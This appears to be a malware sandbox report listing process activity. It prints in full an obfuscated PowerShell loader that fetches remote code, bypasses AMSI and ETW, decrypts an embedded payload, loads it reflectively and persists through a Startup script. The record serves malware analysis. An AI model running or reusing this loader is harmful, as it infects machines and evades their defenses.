Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1
Suspicious command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmdJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmdJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
